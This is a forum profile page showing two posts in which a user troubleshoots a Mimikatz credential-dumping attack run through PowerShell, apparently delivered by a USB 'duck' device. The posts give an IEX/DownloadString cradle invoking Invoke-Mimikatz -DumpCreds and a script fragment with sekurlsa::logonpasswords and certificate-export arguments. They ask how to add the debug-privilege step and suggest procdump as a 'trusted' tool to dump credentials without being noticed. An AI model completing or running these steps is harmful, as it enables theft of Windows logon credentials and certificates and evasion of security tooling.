Jump to content

derjussar

Members
  • Posts

    3
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

derjussar's Achievements

Newbie

Newbie (1/14)

  1. I think I'm just gonna use procdump to dumb the creds and then view them later with mimikatz seeing how procdump is a "trusted" windows tool!
  2. Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK) How do I run the priv command and then the dump passwords command? if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords Exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command }
×
×
  • Create New...